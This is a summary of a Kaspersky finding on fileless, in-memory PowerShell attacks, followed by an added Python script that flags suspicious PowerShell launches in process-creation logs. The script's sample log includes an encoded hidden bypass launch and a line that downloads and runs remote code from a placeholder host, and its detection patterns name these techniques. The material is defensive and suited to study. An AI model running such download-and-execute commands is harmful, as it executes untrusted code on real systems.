Researchers at Kaspersky Lab have uncovered a series of targeted attacks that use legitimate software to avoid detection. The attacks employ widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. They drop no malware files onto the hard drive but instead run entirely in memory. This combined approach avoids detection by whitelisting technologies and leaves forensic investigators with almost no artifacts or malware samples to work with. The attackers stay only long enough to gather information before their traces are wiped from the system on the first reboot. The…
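Because in-memory activity of this kind leaves little on disk and disappears at reboot, centrally collected process-creation logs are often the only durable record a responder has. The following is an added example, not code from the Kaspersky write-up: a small Python triage routine that scans process-creation records for PowerShell launch patterns commonly associated with in-memory execution (encoded commands, hidden windows, policy bypass, in-memory download/evaluation helpers, and launch from parents that typically indicate remote execution). The `Key: value | Key: value` line format, the field names, the parent-process list, and the indicator weights are all assumptions for illustration, and the log lines are constructed.

```python
"""Triage of constructed process-creation log lines for fileless-style PowerShell use.

Added example; assumes a Sysmon-like "Key: value | Key: value" record format.
Field names, parent-process list and weights are assumptions to tune per environment.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample records (not real telemetry). Line 2 and line 4 are the
# interesting ones; line 1 is a routine scheduled script and line 3 is not PowerShell.
SAMPLE_LOG = (
    "UtcTime: 2017-02-08 10:01:12 | Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage: C:\\Windows\\explorer.exe"
    " | CommandLine: powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1\n"
    "UtcTime: 2017-02-08 10:03:44 | Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage: C:\\Windows\\System32\\services.exe"
    " | CommandLine: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc PLACEHOLDERBASE64==\n"
    "UtcTime: 2017-02-08 10:05:09 | Image: C:\\Windows\\System32\\notepad.exe"
    " | ParentImage: C:\\Windows\\explorer.exe | CommandLine: notepad.exe C:\\notes.txt\n"
    "UtcTime: 2017-02-08 10:07:30 | Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    " | CommandLine: powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"\n"
)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parent processes that, for PowerShell children, commonly indicate remote or
# service-based launch rather than an interactive user (assumed list).
REMOTE_EXEC_PARENTS = {"services.exe", "wmiprvse.exe"}

# Indicator name -> (regex over the command line, weight). PowerShell accepts
# abbreviated switches, so the patterns cover the short forms as well.
INDICATORS = {
    "encoded_command": (re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand|c)?(?=\s|$)", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"-e(?:xec|xecutionpolicy)?\s+bypass", re.I), 2),
    "in_memory_execution": (
        re.compile(r"\b(?:iex|invoke-expression|downloadstring|frombase64string)\b", re.I), 3),
}


@dataclass
class Finding:
    time: str
    score: int
    indicators: List[str] = field(default_factory=list)
    command_line: str = ""


def parse_record(line: str) -> Dict[str, str]:
    """Split one 'Key: value | Key: value' record into a dict (assumed format)."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        if key:
            fields[key.strip()] = value.strip()
    return fields


def score_record(rec: Dict[str, str]) -> Finding:
    """Score a single record; non-PowerShell images always score zero."""
    image = rec.get("Image", "").rsplit("\\", 1)[-1].lower()
    finding = Finding(time=rec.get("UtcTime", ""), score=0,
                      command_line=rec.get("CommandLine", ""))
    if image not in POWERSHELL_IMAGES:
        return finding
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(finding.command_line):
            finding.indicators.append(name)
            finding.score += weight
    parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in REMOTE_EXEC_PARENTS:
        finding.indicators.append("remote_exec_parent")
        finding.score += 2
    return finding


def triage(log_text: str, threshold: int = 4) -> List[Finding]:
    """Return the records whose combined indicator weight reaches the threshold."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = score_record(parse_record(line))
        if finding.score >= threshold:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.time}  score={f.score}  {','.join(f.indicators)}\n    {f.command_line}")
```

The threshold is deliberately above any single indicator's weight: a hidden window or an encoded command on its own is routine in many administrative scripts, and it is the combination (for example an encoded, hidden, policy-bypassing launch under `services.exe`) that is worth an analyst's time. Because such launches are wiped from the endpoint at the first reboot, the value of this check depends on process-creation events (and PowerShell script block logs, where enabled) being forwarded off the host as they occur.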